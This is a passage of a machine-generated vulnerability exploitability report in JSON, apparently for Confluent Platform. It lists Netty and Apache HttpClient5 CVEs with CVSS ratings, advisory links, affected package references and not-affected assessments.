          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#cd4454f4-c858-47be-bc35-7f5075b4b30a"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#f6d97189-b8c9-45d6-a238-a601e1db6cb9"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fda97a46-7093-4a32-a0e5-3b90984a8150"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#e629f446-1688-422b-8839-a7c13e4405b1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#bf287c4e-f32d-4fd6-b7b9-a36141991c03"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#f8f87321-52d0-4a35-a7e2-5e336e32ba2c"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#98a9db66-7d09-461d-8096-a81c787dd770"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#a59bf860-58b0-49f0-bffa-b9ef23a90039"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#987ff9b0-2852-4e09-be3f-dd8ad55e3b42"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c5271fdb-2804-4d74-becc-b8bf22854657"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#4625c928-ea3c-4783-a039-a78bf4bcce65"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#df3167fd-2762-4db9-817a-714eedf67be7"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e242e76c-2bd6-4b85-b4ee-900e5c1371be"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59901",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the `Bzip2Decoder` handler in Netty's compression codec pipeline is vulnerable to a denial-of-service attack through a malformed bzip2 stream that permanently captures the event-loop thread in an infinite loop. The vulnerability exists in the run-length encoding (RLE) state machine within [`Bzip2BlockDecompressor.read()`]. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec to version 4.1.136.Final; Upgrade io.netty:netty-codec-compression to version 4.2.16.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59901"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59901"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-558v-64gr-wgg4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59901"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59901"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:27+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-compression@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-compression@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#41512e99-5bb6-4bb9-b5d5-41d50c3c5e85"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ea46ee47-c9a9-49ad-81ec-1b803fe5537a"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#fd8efae0-a99d-421a-b0a9-87a1812de785"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#c0b76686-79d3-48e3-a204-fe1ce40cb889"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#9674776a-58c9-4997-92df-8ab8408c11e2"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#d56d8bef-c95e-4cc9-a10c-4133bde5febc"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#4e7cf547-fc15-449d-b619-51e9a2c94824"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#cca9a842-7c5a-4688-a50a-36da26d127a5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#f654a908-1be3-4f4f-9307-fba300a18ab2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#b1d0a26b-cc31-41fe-8ee8-04f8edc52c01"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#cf7bec36-01cf-4b86-a030-419fa62431c4"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#d3b23da2-9c0e-4108-bde6-6ad8f75333ca"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c13d0318-1be3-480f-87e7-406f999fcc23"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#d0244a6d-767b-46df-a3ed-13e9e875cc94"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ece0b873-f34a-41ac-af83-be6add87af34"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Netty's Bzip2Decoder is not used in the Confluent Platform codebase."
      }
    },
    {
      "id": "CVE-2026-59903",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
        }
      ],
      "cwes": [
        524
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59903"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-8c42-7qj2-3j46"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-17T19:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59921",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\\r\\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59921"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59921"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-gcjf-9mgh-3p7g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59921"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59921"
        }
      ],
      "published": "2026-07-28T23:17:09+00:00",
      "updated": "2026-08-07T15:05:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b1b42980-e87b-46fb-be86-f34ad6f9c7ee"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cff319d9-d2ab-4007-9da2-703d1fc7dba4"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#fa671cee-ccf5-489e-a0dc-c5cb76f01208"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#a6670819-be8c-4e71-80d2-8c83f6a9e2f2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#79b6a2a2-1138-4f6c-86a6-7515a31a79e5"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#95def8fc-e2a0-4428-86a7-fc8b0f327481"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#3c01b3bd-7a53-46e9-a65d-82fc92230cda"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#61b8b13d-fc97-47e3-af68-ec382837e498"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#c5d116b9-00ed-45c5-bb98-c906f8511aa6"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e4918e4b-9d4d-4e6a-ab05-bca0c81718aa"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#dc043094-2429-4640-aa08-314bb97fa93c"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ec30aa83-f779-4849-ac6d-82699cdb225e"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#e9603ec6-3fa6-4dbf-a005-d3ff97032634"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-64607",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        772
      ],
      "description": "HttpClient based on the classic i/o model fails to correctly release the underlying connection back to the connection manager if it encounters an invalid or unsupported `Content-Encoding` header value in the response message.\u00a0Please note this defect does not affect HttpClient based on the async i/o model.\n\nThis issue affects Apache HttpComponents Client: from 5.0-alpha1 through 5.6.2.",
      "recommendation": "Upgrade org.apache.httpcomponents.client5:httpclient5 to version 5.6.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-64607"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/08/13/5"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/55733f4121f7ba26ddf04fe12739d9c15962cb94"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/ebac9512f555c4a355cad3f59ef2db69b597cc97"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.6.3"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.7-alpha1"
        },
        {
          "url": "https://lists.apache.org/thread/qqfzo3fqcdk4l5496vz95ppvl4ty511q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-64607"
        }
      ],
      "published": "2026-07-31T11:17:11+00:00",
      "updated": "2026-08-13T17:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4",
          "versions": [
            {
              "version": "5.4.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4",
          "versions": [
            {
              "version": "5.4.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.5",
          "versions": [
            {
              "version": "5.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.3",
          "versions": [
            {
              "version": "5.4.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#d1eb495d-e097-4ad9-ad41-b4997f3e79d0"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#83236698-f4f0-4750-becd-429dd758acd0"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.4.4"
        },
        {
